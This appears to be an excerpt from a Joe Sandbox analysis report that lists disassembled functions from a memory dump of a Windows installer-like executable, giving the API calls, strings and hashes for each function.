                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                          • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                                                                                          • Instruction ID: 710d819d1312add9e13c9ca032a1bf4137a3805f6e7d7a8d90d4e290f8251a8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB09210E39802C1D708BB229C8946853A4FF9830AFC00832C50D84120DF9C919BC714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                          • String ID: "$:$@$RegServer
                                                                                                                                                                                          • API String ID: 1203814774-4077547207
                                                                                                                                                                                          • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                          • Instruction ID: a41630a3d13cd85b264970e7d65c0769b898f916cfba64184c02d35d58e4aee1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C502C361A2CE8245EB6CAB245804E7DEBA1EFC1752FD80173CD5E06694CFADE407C728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64A86
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64AAA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64ACA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64AEC
                                                                                                                                                                                          • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64B1B
                                                                                                                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64B3A
                                                                                                                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64B54
                                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 00007FF7D2A64BF1
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D2A635E3), ref: 00007FF7D2A64C0D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                          • API String ID: 1865808269-1731843650
                                                                                                                                                                                          • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                          • Instruction ID: 650a9057abc737391f5a284bdb4095f39500c2c4c3c671db6a8b32c033590c65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88513D25A0DE8386E718AB11A414A7DBA91FBC9B92FC44136DE4E03754DFBCD44AC728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                                                                                          • String ID: Adv$rce.
                                                                                                                                                                                          • API String ID: 2929476258-1496161719
                                                                                                                                                                                          • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                          • Instruction ID: 8468ecc56dac2a0a7d13898da4f323a5edd07289f8a9f6cc4cfc5d6945dda971
                                                                                                                                                                                          • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD61C621E0CB828AEB19AB61A400BBDEA90EBD9B55FC45132DD4D03791DF7CE447C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                          • API String ID: 2659952014-2428544900
                                                                                                                                                                                          • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                          • Instruction ID: dede68a89d398960438c47b03bfe26daee0107750dadd65139e1bc900d5770ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5518172608A8286EB14AB10E844ABEBBA0FBC9B92FD45032DE4E03754CF7CD446C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                          • String ID: Adv
                                                                                                                                                                                          • API String ID: 3785188418-921584719
                                                                                                                                                                                          • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                                                                                                          • Instruction ID: b913247908d44300593979404d9082eb4660d4846a2f4efb9f050b154b8e2ba8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2310335908E4386E7186B25A408A7CEA51FBCAB53FC59232CD1E02794CFBC904BC628
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2168512254-0
                                                                                                                                                                                          • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                          • Instruction ID: 2437d978a9ae6420c829e4917138ea0b65135bd1fd7f9e8d1f3e52c61f24a385
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC518F72608E42CAE714AF21E484AADBBA4FBC9B89FC15136DE0E53B54CF78D445C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                          • API String ID: 3346862599-1109908249
                                                                                                                                                                                          • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                          • Instruction ID: 1789270e5ae7667eb0f38969fa7f5814c573b088afd2b236b116e39b1ad6aba5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1518232A08E428AEB14AB20944057DF7A5F7C4B52FC65632DE5D07790DFBCE44AC724
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1051330783-0
                                                                                                                                                                                          • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                          • Instruction ID: 2f265948582248726882bd7bce4b393a62cc05bbaddea97253cb126ea0c16af3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF515C32A04A428AFB249F159400ABCB765FBC9B56FD45132DE0D63754DFBDE442C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 975904313-0
                                                                                                                                                                                          • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                          • Instruction ID: f34bf8c4941ebab5ecff611f0e470a84177d09b747981c3e2aabcdf173afcbf7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01518461A0CAC645FB256F2194007BCEB91EBC9B92FC88172CE9E06785CF6CD447C728
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65078
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65089
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650AF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LoadResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650C0
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LockResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650CF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: memcpy_s.MSVCRT ref: 00007FF7D2A650EE
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FreeResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650FD
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7D2A63139), ref: 00007FF7D2A63F95
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF7D2A64018
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: LoadStringA.USER32 ref: 00007FF7D2A64E60
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: MessageBoxA.USER32 ref: 00007FF7D2A64EA0
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67700: GetLastError.KERNEL32 ref: 00007FF7D2A67704
                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7D2A63139), ref: 00007FF7D2A6403E
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF7D2A63139), ref: 00007FF7D2A6409F
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67AC8: FindResourceA.KERNEL32 ref: 00007FF7D2A67AF2
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67AC8: LoadResource.KERNEL32 ref: 00007FF7D2A67B09
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7D2A67B3F
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A67AC8: FreeResource.KERNEL32 ref: 00007FF7D2A67B51
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF7D2A64078
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                          • String ID: <None>$LICENSE
                                                                                                                                                                                          • API String ID: 2414642746-383193767
                                                                                                                                                                                          • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                                                                                                          • Instruction ID: c299d6dfe1af0f4ae309c75e5da4acd2cd81f6c532b1bf887d62d21f476b224c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33311B61A1DE0386E728AF20A415B7DB660EBC5786FC54136DD0E46690DFBEE106C628
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A6114C: _vsnprintf.MSVCRT ref: 00007FF7D2A61189
                                                                                                                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D2A6606F), ref: 00007FF7D2A67763
                                                                                                                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D2A6606F), ref: 00007FF7D2A67772
                                                                                                                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D2A6606F), ref: 00007FF7D2A677B8
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D2A6606F), ref: 00007FF7D2A677EC
                                                                                                                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D2A6606F), ref: 00007FF7D2A67805
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                          • String ID: UPDFILE%lu
                                                                                                                                                                                          • API String ID: 2922116661-2329316264
                                                                                                                                                                                          • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                          • Instruction ID: 9dcc6685ddcefd54decc72781a8f235cc1b0fabc421b4fea73bdf1bcc76e84dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64316F32A18E4286E718AB21A80097DFBA1EBC9B51FD58236DE5E07794CF7CE446C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3370778649-0
                                                                                                                                                                                          • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                          • Instruction ID: 003709ed9d3a0117588befe8514d1a4c3065ce73ed10f72965ea31cfd2a4444d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D110821708B8287EB186B62A45447DFAA0EB8EFC2FC99179DE0E43754DF7CD446C618
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                          • String ID: wininit.ini
                                                                                                                                                                                          • API String ID: 3273605193-4206010578
                                                                                                                                                                                          • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                          • Instruction ID: c81aa25e4b3d5f0f499cf34fc41233efd3eb8084251b51224c936e12fe630071
                                                                                                                                                                                          • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E113D32608A8287E724AB31E8546ADF7A1FBCD706FC58132DE4E43654DF7CD50ACA14
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
